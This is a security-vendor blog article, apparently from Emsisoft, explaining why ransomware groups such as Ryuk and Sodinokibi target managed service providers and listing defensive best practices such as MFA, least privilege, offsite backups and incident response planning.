MSPs, often tasked with providing customers with IT security services, have found themselves in the crosshairs as ransomware groups increasingly focus their attacks on the MSP market, where a single incident can enable threat actors to deploy ransomware to dozens of businesses.
For MSPs, this poses a significant security challenge – but it also presents an opportunity. Prioritizing internal security protocols allows service providers to better protect themselves and, by extension, their customers. It also enables security-conscious MSPs to differentiate from competitors who may be more vulnerable to compromise.
In this article, we’ll explore why ransomware groups are targeting MSPs and discuss best practices for mitigating ransomware attacks.
Why do attackers target MSPs?
MSPs are a logical target for ransomware groups. In 2018, the Department of Homeland Security issued an alert stating that threat actors had been targeting MSPs since May 2016.
Since that warning was issued, dozens of MSPs have fallen to ransomware, leading to tens of thousands of endpoints being encrypted and ransomware groups generating millions of dollars.
Sadly, the trend doesn’t seem to be stopping any time soon. But why exactly are MSPs such popular targets?
Easy access to targets
MSP infrastructure enables attackers to gain direct access to clients. By using the legitimate credentials of a compromised MSP, attackers can move freely between an MSP and its customers’ shared networks, where ransomware can be deployed with little effort.
As the Department of Homeland Security noted: “MSPs generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure. By servicing a large number of customers, MSPs can achieve significant economies of scale. However, a compromise in one part of an MSP’s network can spread globally, affecting other customers and introducing risk.”
Most ransomware attacks are financially motivated. While companies are typically discouraged from paying the ransom, MSPs are often more inclined to pay because failure to do so will result in significant downtime for their entire client base and may cause irreparable damage to the MSP’s reputation.
Given that the average North American MSP has 52 active customers, according to a report by SolarWinds and The 2112 Group, the collective financial impact of a ransomware attack on an MSP can be enormous.
Lack of resources
MSPs are often much smaller than the companies they serve – in fact, 65 percent of MSPs have less than 10 full-time employees, according to the above report.
Smaller MSPs are typically operating with limited resources, may lack dedicated security personnel and are often so busy that they simply don’t have the time to maintain strict cybersecurity practices.
Consequently, MSPs can be easier targets than larger corporations, while still giving attackers access to potentially hundreds or thousands of endpoints.
Biggest ransomware threats for MSPs
First discovered in August 2018, Ryuk was infamous for targeting large enterprises and making ransom demands that were, at the time, more than 10 times the average. Ryuk is typically dropped onto systems that have been compromised by Emotet and/or Trickbot, two trojans that are usually distributed via phishing emails. A number of MSPs have been affected by Ryuk, including Data Resolution, CorVel and CloudJumper.
Sodinokibi, sometimes referred to as REvil, was first spotted in April 2019. Threat actors typically use Sodinokibi to target MSPs by exploiting RDP vulnerabilities, stealing privileged credentials and leveraging commonly used remote monitoring and management (RMM) software to deploy ransomware to an MSP’s customers’ endpoints. Many MSPs have been affected by Sodinokibi, including Complete Technology Solutions, PerCSoft and Synoptek.
Best practices for mitigating ransomware
Adhering to proven cybersecurity fundamentals can go a long way toward securing both internal and client endpoints. The following recommendations should not be considered comprehensive but rather a collection of best practices for mitigating ransomware.
1. Secure remote access tools
One of the most effective things an MSP can do to mitigate ransomware is to ensure remote access tools are as secure as possible. This might involve:
- Enforcing MFA: Multifactor authentication (MFA) is a simple and very effective way to prevent attackers using compromised credentials to log in to remote access tools. Enable and enforce MFA wherever possible, with no exceptions.
- Implementing IP restrictions: Consider using IP restrictions to only allow users connected to the MSP’s local network to access remote administration tools.
- Update RMM software: Vendors regularly release software updates to fix known vulnerabilities in their software. While patching may be inconvenient at times, it should always be considered a priority.
- Secure RDP: Remote Desktop Protocol (RDP) is Windows’ native remote administration tool, which has been repeatedly exploited in ransomware attacks. This guide from UC Berkeley is a good starting point for MSPs that wish to learn more about securing RDP, while this blog post offers some advice for preventing RDP brute force attacks.
2. Restrict network access
Ransomware attacks on MSPs frequently involve the use of stolen credentials. MSPs should operate on the assumption that their accounts will be compromised at some point and take steps to restrict network access accordingly.
- Adopt the principle of least privilege: Employees should only have access to the minimum resources necessary to do their jobs. Limit access rights and regularly audit permissions to ensure privileges are in line with current requirements. Staff should not have local administrator rights unless it’s specifically needed for them to do their work.
- Practice good authentication hygiene: Staff should understand the fundamentals of creating strong passwords and avoid sharing or recycling login credentials. Consider using a password manager and enable MFA where possible.
- Prevent lateral movement: When an attacker gains access to one asset within a network, they’ll typically try to obtain a stronger foothold by spreading laterally across the network. Application whitelisting, MFA, network segmentation and good password management may be useful tools for preventing lateral movement. See this guide from the U.K.’s National Cyber Security Centre for more information.
3. Disable PowerShell if it’s not used
PowerShell is Microsoft’s built-in framework for task automation and configuration management. While it has many legitimate uses, PowerShell is often used by threat actors to deploy ransomware as it can execute macros, provide full access to many Windows system functions and execute payloads from memory.
MSPs should disable PowerShell if it is not critical to operations. MSPs that must use PowerShell should closely monitor all PowerShell activity so that suspicious behavior can be identified and stopped as quickly as possible.
4. Secure endpoints
While ransomware can be distributed in many different ways, most attacks still originate the old fashioned way – with a user getting duped by a malicious email. MSPs can protect their employees with the use of:
- Email security: Email authentication methods such as DMARC, SPF and DKIM are very useful for verifying sender domains, identifying forgery and preventing business email compromise attacks.
- Web filtering: Security tools such as Emsisoft Browser Security prevent users from accessing malicious websites and prevent phishing attacks.
- Endpoint security: Reliable antivirus software is crucial for preventing ransomware and other malware that may be used to deploy ransomware. For internal and client malware protection, MSPs may wish to consider Emsisoft Business Security, which features the Cloud Console, a web-based platform that allows for efficient remote endpoint security management. Emsisoft Business Security is the only endpoint security solution that checks for the use of recycled leaked passwords, which are frequently used in MSP hacks and ransomware attacks.
5. Select software carefully
MSPs rely on a wide range of tools to serve the diverse needs of their customers. Given that each of these tools is a possible point of entry for attackers, it’s important that MSPs evaluate the security practices of vendors before committing to a software solution.
6. Create offsite backups
An effective backup system is a critical part of any ransomware mitigation strategy. For MSPs, it’s important to remember that if an attacker has compromised their RMM software, they probably also have access to the MSP’s backups.
If an attacker has the opportunity to delete backups and gain additional leverage, they will do so. In addition, some ransomware strains are designed to encrypt backups stored both locally and in the cloud.
The simplest and most effective way of creating ransomware-proof backups is to adopt the 3-2-1 rule, which stipulates that an MSP should:
- Keep at least three copies of its files.
- Store the copies on at least two different types of storage media.
- Store at least one copy offsite. This copy should be isolated from the network, accessible to almost no-one and preferably stored offline.
See this comprehensive guide for more information on how companies can protect backups from ransomware.
7. Implement BYOD policies
Cloud-based tools are ubiquitous in the MSP environment, but any device that is used to access corporate resources should be considered a potential security risk.
MSPs should not only ensure that all company-issued devices used for work purposes are properly secured but also implement policies for employees who use personal devices to work remotely.
Restricting network access, enforcing the use of a VPN, implementing device encryption and making MFA compulsory can help MSPs secure BYOD devices and reduce the risk of compromise.
8. Develop and test an incident response plan
Unfortunately, an MSP can do everything right and still experience a ransomware incident. When an incident occurs, it’s essential that MSPs have a plan in place that allows them to respond quickly and effectively.
- Communication: Establish responsibilities so that both staff and company leaders know what to do in the event of a ransomware incident. Define who needs to be contacted and in what order. This may include internal staff, customers, law enforcement, attorneys, PR and more.
- Isolate: Establish a strategy for isolating or disabling affected devices. Removing affected machines from the network limits the spread of ransomware.
- IR specialists: There are a number of incident response (IR) companies that aim to help ransomware victims restore operations, which often involves negotiating with threat actors to recover encrypted data. MSPs should evaluate IR options and have a contact number on hand should their services ever be required. Here at Emsisoft, we create custom decryption solutions for certain strains of ransomware for affected companies.
- Analysis: Define policies to preserve evidence that may help with the investigation. Policies should include guidance on how to collect as much information as possible about the incident, including log files, system images, samples of the encrypted files and the ransom note (if applicable) which may be useful for analysis. Staff should be prohibited from deleting any encrypted files until instructed to do so.
- Remediation: Define how the malware will be removed (if possible) and how systems will be restored via backups. MSPs will also need to consider investing resources into fixing the vulnerability that was exploited to reduce the risk of a future incident.
See the Department of Homeland Security’s report for more information on developing a ransomware IR plan, and check out our blog post for considerations when deciding whether or not to pay a ransom.
For MSPs, security is inextricably intertwined with that of their customers. If an MSP is compromised, it is highly likely that its customers will follow, leading to hugely disruptive downtime and massive ransom demands.
Businesses put a lot of trust in MSPs – it’s important that MSPs honor this trust by doing everything they can to reduce the risk of a ransomware incident. MSPs that take a proactive approach to security can gain a competitive edge as cybersecurity becomes an increasingly important business consideration across industries.